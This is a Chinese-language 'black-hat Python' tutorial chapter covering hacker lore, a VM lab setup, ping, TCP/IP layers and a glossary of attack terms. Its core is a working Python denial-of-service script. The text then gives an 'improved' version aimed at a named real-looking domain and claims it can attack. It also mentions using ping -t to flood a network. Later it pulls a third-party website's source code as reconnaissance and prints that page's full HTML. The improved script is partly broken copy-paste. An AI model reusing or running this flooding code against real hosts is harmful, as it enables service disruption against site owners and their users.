引子
Hacker(黑客),往往被人们理解为只会用非法手段来破坏网络安全的计算机高手。但是,黑客其实不是这样的,真正的“网络破坏者”是和黑客名称和读音相似的骇客。
骇客,是用黑客手段进行非法操作并为己取得利益的人。黑客,是用黑客手段为国家或单位做事的人。
那么,既然黑客不是一个很坏的职业,我们就可以去试着学习。
黑客本身的初衷
——黑客其实一直是善良的。 骇客其实他的前身就是黑客。
骇客与黑客分家,有这么一个故事:
原本,只有黑客一族。而不久后,有些黑客想用黑客手段来获取利益,不断被其他的黑客反对。于是,那些黑客悄悄私下成立了一个新的族群——骇客族。
骇客族产生后,一直处于保密状态,所以,没有人知道这个族。
直到有一天——
骇客族出现了一次大骚动:
不断的进行网络欺骗、流量攻击,盗取了很多人的账号,还修改了一些大型的搜索网站。
于是,从这天开始,黑骇(黑客和骇客)分家了。
黑客的初衷本是一些测试程序漏洞的计算机高手,他们还帮国家和单位做事。但是,人心总是贪婪,造成了骇客的诞生。
从此以后,杀毒软件诞生了。
基础篇
什么是internet?什么是网络攻击?
internet(因特网),就是一个大村落,将所有的计算机连接在一起,成为一个“地球村”。在internet里,我们可以玩游戏、看电视
、听音乐,甚至可以让相距千里的朋友接到我的信息!这就是internet的基本介绍。
网络攻击,就是用网络进行攻击。internet不仅为我们带来了好处,也带来了坏处。我们接着上一篇(详情见:Python3.7黑帽编程——病毒篇(基础篇))讲,我们做好了病毒,就要用网络来进行传播,这样才可以让病毒起作用。以及,我们还可以学习攻击网站,在网站上进行病毒放置,甚至到账户密码盗取!这,就是黑客技术的威力!
安装编程环境:Python3.7 IDE
在编写程序进行黑客攻击和病毒编写之前,我们得先安装我们的编程环境:Python3.7 IDE
从网络上下载:Python3.7 IDE
接着,双击它,按照安装向导完成安装。
启动
在Windows搜索栏中搜索:Python
会显示出:
打开它!
打造攻击目标:VMware虚拟机
我们现在还没有一个攻击目标,因为我们现在不能攻击别人的电脑,否则,你就是骇客了。
那么,我们只有安装VMware虚拟机了。
安装VMware Workstation player
(注:此处不细说,因为版本不一,安装不一样)
打开!
然后,请下载Windows 7 原生纯净镜像,可以百度“我告诉你”,点击第二个,下载Windows7。
新建虚拟机
点击“创建新虚拟机”
点击“下一步”
这里需要输入Windows7的密钥,按图中输入。
下一步:
下一步:
我们已经完成了VMware Workstation 虚拟机的配置,现在我们启动它:
在这段时间内,计算机(虚拟机)会重启数次,最终完成安装。
安装成功后即可开始使用Windows 7 ,并且可以向它发起猛烈的攻击了。
Windows7是微软(Microsoft)的杰出产品之一,但可惜的是它还是被更优秀的Windows10取代。在2015年,微软(Microsoft)正式宣布不再支持Windows7,也就意味着,不会再有新的更新给使用Windows7的用户了。
启动成功!我们可以在这台Windows上工作,并且也可以攻击它了!
编写经典程序——Hello,World!
打开Python,点击File,New。
在弹出的窗口中输入:
print('Hello, World!')
点击Run,最后一个选项,查看结果。
显示:
Hello, World!
这表示IDE程序可用,也表示,你已经成为一名程序员了!
测试网络的PING
PING程序是Microsoft(微软公司)为Windows用户准备的网络检测程序,使用他,可以帮你查看网络状态和网络是否可访问。
键击“windows键+R”,打开运行窗口,输入cmd,回车,即可打开终端窗口。在这里,你可以做很多一般人做不到的事情。
在终端里输入ping/?,查看详细用法。
常用指令:
PING -t ip
注:这样可以PING指定的IP到永远,除非你停止它。很多初级黑客喜欢用这个参数来进行网络堵塞的攻击。
PING -l 大小 ip
注:这样可以设置发送包大小
PING -n 次数 ip
注:这样可以设置次数。
试试对baidu.com进行PING指令
打开终端,输入PING -n 10 -l 10 baidu.com
(此命令必须在Windows 8以上才可以运行,Windows 7部分版本不支持PING网页)
我们检测到我们可以连接到baidu.com,说明我们的网络是可用的。
TCP\IP协议
TCP/IP传输协议,即传输控制/网络协议,也叫作网络通讯协议。它是在网络的使用中的最基本的通信协议。TCP/IP传输协议对互联网中各部分进行通信的标准和方法进行了规定。并且,TCP/IP传输协议是保证网络数据信息及时、完整传输的两个重要的协议。TCP/IP传输协议是严格来说是一个四层的体系结构,应用层、传输层、网络层和数据链路层都包含其中。
TCP/IP协议是Internet最基本的协议,其中应用层的主要协议有Telnet、FTP、SMTP等,是用来接收来自传输层的数据或者按不同应用要求与方式将数据传输至传输层;传输层的主要协议有UDP、TCP,是使用者使用平台和计算机信息网内部数据结合的通道,可以实现数据传输与数据共享;网络层的主要协议有ICMP、IP、IGMP,主要负责网络中数据包的传送等;而网络访问层,也叫网路接口层或数据链路层,主要协议有ARP、RARP,主要功能是提供链路管理错误检测、对不同通信媒介有关信息细节问题进行有效处理等。
TCP/IP协议能够迅速发展起来并成为事实上的标准,是它恰好适应了世界范围内数据通信的需要。它有以下特点:
(1)协议标准是完全开放的,可以供用户免费使用,并且独立于特定的计算机硬件与操作系统。
(2)独立于网络硬件系统,可以运行在广域网,更适合于互联网。
(3)网络地址统一分配,网络中每一设备和终端都具有一个唯一地址。
(4)高层协议标准化,可以提供多种多样可靠网络服务。
TCP/IP协议的层次
网络层
IP协议
网络层引入了IP协议,制定了一套新地址,使得我们能够区分两台主机是否同属一个网络,这套地址就是网络地址,也就是所谓的IP地址。IP协议将这个32位的地址分为两部分,前面部分代表网络地址,后面部分表示该主机在局域网中的地址。如果两个IP地址在同一个子网内,则网络地址一定相同。为了判断IP地址中的网络地址,IP协议还引入了子网掩码,IP地址和子网掩码通过按位与运算后就可以得到网络地址。
ARP协议
即地址解析协议,是根据IP地址获取MAC地址的一个网络层协议。其工作原理如下:ARP首先会发起一个请求数据包,数据包的首部包含了目标主机的IP地址,然后这个数据包会在链路层进行再次包装,生成以太网数据包,最终由以太网广播给子网内的所有主机,每一台主机都会接收到这个数据包,并取出标头里的IP地址,然后和自己的IP地址进行比较,如果相同就返回自己的MAC地址,如果不同就丢弃该数据包。ARP接收返回消息,以此确定目标机的MAC地址;与此同时,ARP还会将返回的MAC地址与对应的IP地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。
路由协议
首先通过IP协议来判断两台主机是否在同一个子网中,如果在同一个子网,就通过ARP协议查询对应的MAC地址,然后以广播的形式向该子网内的主机发送数据包;如果不在同一个子网,以太网会将该数据包转发给本子网的网关进行路由。网关是互联网上子网与子网之间的桥梁,所以网关会进行多次转发,最终将该数据包转发到目标IP所在的子网中,然后再通过ARP获取目标机MAC,最终也是通过广播形式将数据包发送给接收方。而完成这个路由协议的物理设备就是路由器,路由器扮演着交通枢纽的角色,它会根据信道情况,选择并设定路由,以最佳路径来转发数据包。
所以,网络层的主要工作是定义网络地址、区分网段、子网内MAC寻址、对于不同子网的数据包进行路由。
传输层
链路层定义了主机的身份,即MAC地址,而网络层定义了IP地址,明确了主机所在的网段,有了这两个地址,数据包就从可以从一个主机发送到另一台主机。但实际上数据包是从一个主机的某个应用程序发出,然后由对方主机的应用程序接收。而每台电脑都有可能同时运行着很多个应用程序,所以当数据包被发送到主机上以后,是无法确定哪个应用程序要接收这个包。因此传输层引入了UDP协议来解决这个问题,为了给每个应用程序标识身份。
UDP协议
UDP协议定义了端口,同一个主机上的每个应用程序都需要指定唯一的端口号,并且规定网络中传输的数据包必须加上端口信息,当数据包到达主机以后,就可以根据端口号找到对应的应用程序了。UDP协议比较简单,实现容易,但它没有确认机制,数据包一旦发出,无法知道对方是否收到,因此可靠性较差,为了解决这个问题,提高网络可靠性,TCP协议就诞生了。
TCP协议
TCP即传输控制协议,是一种面向连接的、可靠的、基于字节流的通信协议。简单来说TCP就是有确认机制的UDP协议,每发出一个数据包都要求确认,如果有一个数据包丢失,就收不到确认,发送方就必须重发这个数据包。为了保证传输的可靠性,TCP协议在UDP基础之上建立了三次对话的确认机制,即在正式收发数据前,必须和对方建立可靠的连接。TCP数据包和UDP一样,都是由首部和数据两部分组成,唯一不同的是,TCP数据包没有长度限制,理论上可以无限长,但是为了保证网络的效率,通常TCP数据包的长度不会超过IP数据包的长度,以确保单个TCP数据包不必再分割。
传输层的主要工作是定义端口,标识应用程序身份,实现端口到端口的通信,TCP协议可以保证数据传输的可靠性。
应用层
理论上讲,有了以上三层协议的支持,数据已经可以从一个主机上的应用程序传输到另一台主机的应用程序了,但此时传过来的数据是字节流,不能很好的被程序识别,操作性差,因此,应用层定义了各种各样的协议来规范数据格式,常见的有http,ftp,smtp等,在请求Header中,分别定义了请求数据格式Accept和响应数据格式Content-Type,有了这个规范以后,当对方接收到请求以后就知道该用什么格式来解析,然后对请求进行处理,最后按照请求方要求的格式将数据返回,请求端接收到响应后,就按照规定的格式进行解读。
所以应用层的主要工作就是定义数据格式并按照对应的格式解读数据。
黑客入门的操作命令
1、“肉鸡”
“肉鸡”有点类似牵线木偶,是指可以被黑客神不知鬼不觉地远程控制的电脑或者大型服务器。不论什么系统都有可能沦为“肉鸡”。
2、“木马”
“木马”是一种在运行后可以得到系统的控制权的程序。拿网页木马举例,主要是利用浏览器的漏洞把网页木马搞到浏览器访问者本地上,然后自动执行的。
3、“后门”
黑客在通过某种手段成功控制目标主机之后,搞到系统的访问权限。访问系统后通过系统漏洞得到root权限,再安装rootkit,就可以较长时间地控制该目标主机。
4、“弱口令”
弱口令的安全强度不高,易于被猜到破解的密码,比如123456、654321。
5、“溢出”
“溢出”一般指的是缓冲区溢出。说白了,就是程序没有进行有效地监测,导致输入的数据没执行。这样的程序和没有执行的数据越来越多,最后程序会解体,也有可能错误地执行黑客的命令。
6、“花指令”
“花指令”是用汇编语言写成的,导致杀毒软件无法对病毒进行合理地判断。因为杀毒软件有顺序规则,就是从头到尾来查杀病毒。而一旦病毒的头尾顺序不对,杀毒软件就歇菜了。
7、“免杀”
“免杀”,顾名思义,就是免去杀毒软件的查杀。使用一些技术把程序进行修改,这些技术主要有加壳、加密、加花指令等。
8、“加壳”
“加壳”的目的主要有压缩文件、将程序编码加密、免杀等,主要通过一些不一般的算法改变可执行程序或者DLL动态链接库文件的编码。
9、“Shell”
“Shell”是一种程序或者命令的执行环境。比如,一般用远程溢出程序后,可以成功控制远程电脑,在该电脑执行系统命令的环境就是“Shell”。
Web网络
我们现在生活在一个富文本网络时代,我们可以在internet上做许多事。一些公司的网站、一些购物超市的网站、一些发消息的网站,都是富文本网络时代下的。那么,我们该如何去进行Web的攻击呢?
首先,在本书,我们将只会学习以下两种Web攻击:
①Web传播病毒
②Web网站攻击
在本书,我们即将成为一名更高深的程序员和黑客了!是不是很期待呢?
回忆
在上本书(Python3.7黑帽编程——病毒篇(基础篇))中,我们有一个DDoS攻击器的制作以及原理解释,接下来,我们来复习一下:
分布式拒绝服务攻击(英文意思是Distributed Denial of Service,简称DDoS)是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的,这类攻击称为分布式拒绝服务攻击,其中的攻击者可以有多个。
代码:
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST=""#在双引号里输入对方IP或域名,要保证他联网了或开机了.
PAGE="/index.php"
#---------------------------
buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
socks=[]
def conn_thread():
global socks
for i in range(0,MAX_CONN):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((HOST,PORT))
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
socks.append(s)
except Exception as ex:
print ("Could not connect to server or send error:%s"%ex)
time.sleep(0.1)
#end def
def send_thread():
global socks
while True:
for s in socks:
try:
s.send("f".encode())
#print "send OK!"
except Exception as ex:
print ("Send Exception:%s\n"%ex)
socks.remove(s)
s.close()
time.sleep(0.1)
#end def
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
conn_th.start()
send_th.start()
原理:
就像接东西,张三接,李四扔。李四不停扔苹果给张三,张三不断接苹果,接着接着,手上满了!那么,只有把苹果掉在地上了。
就是这个原理,我不断进行连接,对方不断处理连接,慢慢的慢慢的,对方的系统主机繁忙到堵塞,一大堆的请求没有处理,堆在网络连接处,系统还在不断处理,等处理到一定时候,系统的运算已经达到了超负荷,就会崩溃。这就是DDoS的原理。
DDoS的深度学习
在本章,我们将深度地学习DDoS,并且学会如何进行防范。
我们把DDoS的原理已经在上一章回忆过了,我们这次来更加深入的研究DDoS——代码的作用与改造
代码
我们在本小节,我们来一行一行地理解代码,一直到弄懂为止。
首先,前三行:
import socket
import time
import threading
这一段的作用是调用头文件——socket、time、threading。
下面:
MAX_CONN=20000
PORT=80
HOST=""#在双引号里输入对方IP或域名,要保证他联网了或开机了.
PAGE="/index.php"
#---------------------------
buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
socks=[]
这几行代码的作用就是获取参数和初始化攻击脚本,如果少了的话,程序将会出错——因为它将没有目标!
继续:
def conn_thread():
global socks
for i in range(0,MAX_CONN):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((HOST,PORT))
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
socks.append(s)
except Exception as ex:
print ("Could not connect to server or send error:%s"%ex)
time.sleep(0.1)
#end def
def send_thread():
global socks
while True:
for s in socks:
try:
s.send("f".encode())
#print "send OK!"
except Exception as ex:
print ("Send Exception:%s\n"%ex)
socks.remove(s)
s.close()
time.sleep(0.1)
#end def
这个是程序的主要部分,也是程序的攻击脚本。如果没有它,将无法进行攻击!
最后:
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
conn_th.start()
send_th.start()
最后,进行循环和函数运行,即可。
改造
我们将改造这个脚本,使其变得更加强大。我们可以将它的脚本里添加点东西:
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST="zhutiantuanfuwuqi.icoc.bz"#在双引号里输入对方IP或域名,要保证他联网了或开机了.
PAGE="/index.php"
#---------------------------
buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
socks=[]
def ddos():
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
while 1:
s.connect((HOST,PORT))
s.send(buf.encode())
s.send(buf.encode())
s.send(buf.encode())
def conn_thread():
global socks
for i in range(0,MAX_CONN):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((HOST,PORT))
s.send(buf.encode())
s.send(buf.encode())
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
socks.append(s)
except Exception as ex:
print ("Could not connect to server or send error:%s"%ex)
time.sleep(0.1)
#end def
def send_thread():
global socks
while True:
for s in socks:
try:
s.send("f".encode())
#print "send OK!"
except Exception as ex:
print ("Send Exception:%s\n"%ex)
socks.remove(s)
s.close()
time.sleep(0.1)
#end def
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
conn_th.start()
send_th.start()
ddos()
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
while 1:
s.connect((HOST,PORT))
s.send(buf.encode())
s.send(buf.encode())
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
while 1:
s.connect((HOST,PORT))
s.send(buf.encode())
s.send(buf.encode())
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
while 1:
s.connect((HOST,PORT))
s.send(buf.encode())
s.send(buf.encode())
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
while 1:
s.connect((HOST,PORT))
s.send(buf.encode())
s.send(buf.encode())
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
while 1:
s.connect((HOST,PORT))
s.send(buf.encode())
s.send(buf.encode())
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
while 1:
s.connect((HOST,PORT))
s.send(buf.encode())
s.send(buf.encode())
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
它的攻击速度更快了!数字不断在眼前划过!这速度真的惊人!
速度更快,威力也就更大。这就是个改良过的脚本,在后期,我例出的许多脚本,我都会在下本书或者后面几篇改良,让它变得更加厉害。
提问
这个代码为什么会变厉害?
答:因为这个代码的线程变多了——简单点说,就不再只是张三李四两个人了,还加上个王二麻子也朝张三扔东西,那张三接不住的可能性不就更大了吗?
为什么我运行时一开始显示了错误?
答:那很正常,不影响程序运行。
这个脚本真的可以攻击吗?
答:可以。只是你一个人看不到效果,要很多人一起才可以。
Web网页源码扫描
我们要对网站进行攻击,首先就要先找到这个网站的漏洞和弱点。而这次,我们将直接获取网页的源代码,进行网页分析!
代码如下(使用秦川联盟网站做目标):
import urllib.request
url = r'https://www.qinnational.xyz/'
res = urllib.request.urlopen(url)
html = res.read().decode('utf-8')
print(html)
结果:
右击这个按钮,按copy,接着,打开记事本,粘贴上去。
秦川联盟的源码如下:
<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<!-- Verifications -->
<meta name="baidu-site-verification" content="lw65VVjI6w" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="msvalidate.01" content="2D76DBA9C0B07B52C5A4E01E9C544670" />
<meta name="360-site-verification" content="f2b92e1ed29f39bd884ee129cccee90c" />
<meta name='keywords' content="中国秦川联盟,秦川联盟">
<meta name=description content="中国秦川联盟是一个综合性组织,批准创建了中国晨风社和雨墨局等组织。我们已经和天狼队、米兔联盟、红龙网络安全组织、FREET安全组和萤火虫网安等组织建立合作关系。" >
<link rel="shortcut icon" href="./static/favicon.ico" />
<title>中国秦川联盟</title>
<meta name="google-site-verification" content="Z7G5Ye7l4HdXD3LNZgM64B2l6DxoF0nyOu6myi858yQ" />
<meta name="shenma-site-verification" content="1fee56e1e4a8da6977eb295b4387a8a4_1566456372">
<meta name="sogou_site_verification" content="L8vKDp4Gys"/>
<link rel="stylesheet" href="./static/fontawesome-5.5/css/all.min.css" />
<link rel="stylesheet" href="./static/slick/slick.css">
<link rel="stylesheet" href="./static/slick/slick-theme.css">
<link rel="stylesheet" href="./static/magnific-popup/magnific-popup.css">
<link rel="stylesheet" href="./static/css/bootstrap.min.css" />
<link rel="stylesheet" href="./static/css/templatemo-style.css" />
<script>
if(window.location.host!="www.qinnational.xyz"){ redirect = "https://www.qinnational.xyz"+location.pathname; window.location = redirect; }
</script>
<script>
(function(){
var src = "https://jspassport.ssl.qhimg.com/11.0.1.js?d182b3f28525f2db83acfaaf6e696dba";
document.write('<script src="' + src + '" id="sozz"><\/script>');
})();
</script>
<script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
</head>
<body>
<!-- Hero section -->
<style>
.declare-wrap {
margin-top: -30px;
background: #fff;
display: none;
}
.declare {
background: #f9f4d9;
color: #8f7f5d;
padding: 10px 15px;
position: relative;
*zoom: 1;
</style>
<section id="hero" class="text-white tm-font-big tm-parallax">
<!-- Navigation -->
<nav class="navbar navbar-expand-md tm-navbar" id="tmNav">
<div class="container">
<div class="tm-next"><a href="#hero" class="navbar-brand">QUC</a></div>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
<i class="fas fa-bars navbar-toggler-icon"></i>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav ml-auto">
<li class="nav-item"> <a class="nav-link tm-nav-link" href="#introduction">关于</a> </li>
<li class="nav-item"> <a class="nav-link tm-nav-link" href="#work">解决方案</a> </li>
<li class="nav-item">
<a class="nav-link tm-nav-link" href="#contact">联系我们</a>
</li>
</ul>
</div>
</div>
</nav>
<div class="text-center tm-hero-text-container">
<div class="tm-hero-text-container-inner">
<h2 class="tm-hero-title">中国秦川联盟</h2>
<p class="tm-hero-subtitle">
Qinchuan Union of China
</p>
</div>
</div>
<div class="tm-next tm-intro-next">
<a href="#introduction" class="text-center tm-down-arrow-link">
<i class="fas fa-3x fa-caret-down tm-down-arrow"></i>
</a>
</div>
</section>
<script>
host = window.location.host;
if(host=='fu050409.gitee.io'){
document.write("<br><br><div class='declare-wrap' id='J-declare-wrap' style='display: block;'><div class='declare' id='J-declare'>注意:本站是由于百度无法收录主站而搭建,同步定期,但万一站长夏侯启懒一懒,就会忘记更新副站,最新内容详见<a class='declare-details' target='_blank' href='https://www.qinchuan.tk'>主站>></a><div class='close-btn' id='J-declare-close'><em class='cmn-icon cmn-icons cmn-icons_close'></em></div></div></div><br><br>")
}
var u = navigator.userAgent;
//Android终端
var isAndroid = u.indexOf('Android') > -1 || u.indexOf('Adr') > -1;
//iOS终端
var isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
if(isiOS){
//如果为iOS
document.write("<br><br><div class='declare-wrap' id='J-declare-wrap' style='display: block;'><div class='declare' id='J-declare'>注意:由于iOS屏蔽了一些插件,我们将在近期内结束对iOS系统的支持!请尽快更换安卓手机!<a class='declare-details' target='_blank' href='https://www.vmall.com/product/10086102942203.html'>华为P30购买>></a><div class='close-btn' id='J-declare-close'><em class='cmn-icon cmn-icons cmn-icons_close'></em></div></div></div><br><br>")
}
</script>
<section id="introduction" class="tm-section-pad-top">
<div class="container">
<div class="row">
<!--<div class="col-lg-6">
<img src="" alt="Image" class="img-fluid tm-intro-img" />
</div>-->
<div class="col-lg-6">
<div class="tm-intro-text-container">
<h2 class="tm-text-primary mb-4 tm-section-title">关于秦川联盟</h2>
<p class="mb-4 tm-intro-text">中国秦川联盟是一个大型综合性学术团体,包含有文学、数学、网络技术等多个方面。于2011年9月1日由夏侯启(代名)、子墨(简名)、李源(代名)等中国秦川联盟早期盟员在中华人民共和国陕西省西安市蓝田县创建。
2017年,首次提出了科技共产战略部署;2019年10月,由龙启发表了<a href="file/scholarly_program.html">《中国秦川联盟学术纲领》</a>,提出了学术支援战略、学术垄断战略、学术驱动发展战略等三大学术战略。
我们批准创建了中国晨风社、<a href="https://ym.agency.qinnational.xyz" id="ymiblink">雨墨情报局</a>、中国红云局等组织。
我们已经和天狼队、米兔联盟、<a href="http://hugozz.net3v.net">红龙网络安全组织</a>、<a href="https://www.freet.tk">Freet安全组</a>、<a href="https://firefliestudio.com">萤火虫网安</a>、<a href='http://gw.qlwltd.site'>QL网络团队</a>等组织建立学术合作关系。<br>
</p>
<div class="tm-next">
<a href="./static/announcement.html" class="tm-intro-text tm-btn-primary">公告</a>
</div>
</div>
</div>
</div>
<div class="row tm-section-pad-top">
<div class="col-lg-4">
<h4 class="text-center tm-text-primary mb-4">合作组织</h4>
<p>
中国天狼队<br>
萤火虫网安(FireFlies’ Studio)<br>
中国米兔联盟<br>
红龙网络安全组织<br>
FREET安全组<br>
QL网络安全团队<br>
</p>
</div>
<div class="col-lg-4 mt-5 mt-lg-0">
<h4 class="text-center tm-text-primary mb-4">批准创建</h4>
<p>
<h5><strong>中国红云局</strong></h5><br>
<small>2014 年 9月 - 创建</small><br>
中国秦川联盟批准创建的一支强大的青年社会工程队伍,是大量社会工程师的聚集地,为中国秦川联盟各项任务辅助。
<br><br />
<h6><strong>发展历史</strong></h6>
<small>2014年中旬,中国盟派(后更名为地球秦川联盟)为了应对中国青龙帮,总部委员会会议决定批准创立中国云特种谍战部队;
<br>
2017年,正式更名为中国云特编局(CnC,ChinaCloud);
<br>
2018年9月21日,地球秦川联盟由于“921齐天泽事件”解体,中国云特编局被迫宣布独立,并持续试图重组地球秦川联盟;
<br>
2018年10月7日,地球秦川联盟重组,更名为中国秦川联盟;
<br>
2019年5月,中国云特编局更名为中国红云局(RCB,RedCloudBureau)。
</small></p>
<p>
<h5><strong>雨墨情报局</strong></h5><br>
<small>2017年2月22日 - 创建</small><br />
中国秦川联盟主要学术思想研究并挂有情报收录之名的组织,是各类天才的聚集地。
<br><br />
<h6><strong>发展历史</strong></h6>
<small>2017年2月2日,由地球秦川联盟批准创建“明镜三阁”——雨墨阁、晨诚阁、子龙阁,直属于地球秦川联盟。2018年2月2日正式完善开始运营。
<br>
后来,由于2018年9月21日“921齐天泽”事件,地球秦川联盟解体,明镜三阁合并为雨墨情报局,宣布独立。
<br>
2018年10月7日,地球秦川联盟重组,更名为中国秦川联盟,雨墨情报局和中国秦川联盟加盟。
<br></small>
</p>
</div>
<div class="col-lg-4 mt-5 mt-lg-0">
<h4 class="text-center tm-text-primary mb-4">直属分部</h4>
<p>
<a href='https://mns.qinnational.xyz'>中国秦川联盟网络安全部</a><br>
<a href='https://ym.agency.qinnational.xyz'>雨墨情报局</a>
</p>
<p>太多,懒得敲。</p>
</div>
</div>
</section>
<section id="work" class="tm-section-pad-top">
<div class="container tm-container-gallery">
<div class="row">
<div class="text-center col-12">
<h2 class="tm-text-primary tm-section-title mb-4">我们的工作</h2>
<p class="mx-auto tm-work-description"> 点击下方以查看我们提供的解决方案,迅速、高效,更值得信赖! <br>
</p>
<a href="static/solve.html" class="tm-intro-text tm-btn-primary">解决方案</a>
</div>
</div>
<div class="row">
<div class="col-12"> <br><br></div>
</div>
</div>
</section>
<section id="work" class="tm-section-pad-top">
<div class="container tm-container-gallery">
<div class="row">
<div class="text-center col-12">
<h2 class="tm-text-primary tm-section-title mb-4">行动规划</h2>
<p class="mx-auto tm-work-description">中国秦川联盟行动规划一览表<br>
</p>
<a href="./project.html" class="tm-intro-text tm-btn-primary">行动规划</a>
</div>
</div>
<div class="row">
<div class="col-12"> <br><br></div>
</div>
</div>
</section>
<!-- Contact -->
<section id="contact" class="tm-section-pad-top tm-parallax-2">
<div class="container tm-container-contact">
<div class="row">
<div class="col-12">
<h2 class="mb-4 tm-section-title">联系我们</h2>
<div class="mb-5 tm-underline">
<div class="tm-underline-inner"></div>
</div>
<p class="mb-5">post@qinnational.xyz是中国秦川联盟对外的官方邮箱,如果您收到其他不是以@qinchuan.tk、@qucmail.tk、@qinchuanunion.tk结尾的邮箱,均不是我们的邮箱,请不要上当受骗!</p>
</div>
<div class="col-sm-12 col-md-6 d-flex align-items-center tm-contact-item"><a href="tel:110" class="tm-contact-item-link"> <i class="fas fa-3x fa-phone mr-4"></i> <span class="mb-0">绝密!(点击后会有出乎意料的效果)</span> </a></div>
<div class="col-sm-12 col-md-6 d-flex align-items-center tm-contact-item">
<a href="mailto:[email protected]" class="tm-contact-item-link">
<i class="fas fa-3x fa-envelope mr-4"></i>
<span class="mb-0"><!--<span class="__cf_email__" data-cfemail="85f5eaf6f1c5f4f0e6e8e4ece9abf1ee">[email protected]</span>-->中国秦川联盟官方邮箱</span>
</a>
</div>
<div class="col-sm-12 col-md-6 d-flex align-items-center tm-contact-item"><a href="#" class="tm-contact-item-link"> <i class="fas fa-3x fa-map-marker-alt mr-4"></i> <span class="mb-0">地图上的位置</span></a></div>
<div class="col-sm-12 col-md-6 d-flex align-items-center tm-contact-item">
<form action="" method="get">
</form>
</div>
</div>
</div>
<footer class="text-center small tm-footer">
<p class="mb-0">©2011~2019 - QINCHUAN UNION OF CHINA<br>
</p>
<p class='mb-0'><a href='static/links.html'>友情链接</a> | <a href="file/constitution.html">章程</a> | <a href="project.html">行动规划</a></p>
</footer>
</section>
<script src="./static/js/jquery-1.9.1.min.js"></script>
<script src="./static/slick/slick.min.js"></script>
<script src="./static/magnific-popup/jquery.magnific-popup.min.js"></script>
<script src="./static/js/jquery.singlePageNav.min.js"></script>
<script src="./static/js/bootstrap.min.js"></script>
<script>
function getOffSet(){
var _offset = 450;
var windowHeight = window.innerHeight;
if(windowHeight > 500) {
_offset = 400;
}
if(windowHeight > 680) {
_offset = 300
}
if(windowHeight > 830) {
_offset = 210;
}
return _offset;
}
function setParallaxPosition($doc, multiplier, $object){
var offset = getOffSet();
var from_top = $doc.scrollTop(),
bg_css = 'center ' +(multiplier * from_top - offset) + 'px';
$object.css({"background-position" : bg_css });
}
var background_image_parallax = function($object, multiplier, forceSet){
multiplier = typeof multiplier !== 'undefined' ? multiplier : 0.5;
multiplier = 1 - multiplier;
var $doc = $(document);
// $object.css({"background-attatchment" : "fixed"});
if(forceSet) {
setParallaxPosition($doc, multiplier, $object);
} else {
$(window).scroll(function(){
setParallaxPosition($doc, multiplier, $object);
});
}
};
var background_image_parallax_2 = function($object, multiplier){
multiplier = typeof multiplier !== 'undefined' ? multiplier : 0.5;
multiplier = 1 - multiplier;
var $doc = $(document);
$object.css({"background-attachment" : "fixed"});
$(window).scroll(function(){
var firstTop = $object.offset().top,
pos = $(window).scrollTop(),
yPos = Math.round((multiplier * (firstTop - pos)) - 186);
var bg_css = 'center ' + yPos + 'px';
$object.css({"background-position" : bg_css });
});
};
$(function(){
// Hero Section - Background Parallax
background_image_parallax($(".tm-parallax"), 0.30, false);
background_image_parallax_2($("#contact"), 0.80);
// Handle window resize
window.addEventListener('resize', function(){
background_image_parallax($(".tm-parallax"), 0.30, true);
}, true);
// Detect window scroll and update navbar
$(window).scroll(function(e){
if($(document).scrollTop() > 120) {
$('.tm-navbar').addClass("scroll");
} else {
$('.tm-navbar').removeClass("scroll");
}
});
// Close mobile menu after click
$('#tmNav a').on('click', function(){
$('.navbar-collapse').removeClass('show');
})
// Scroll to corresponding section with animation
$('#tmNav').singlePageNav();
// Add smooth scrolling to all links
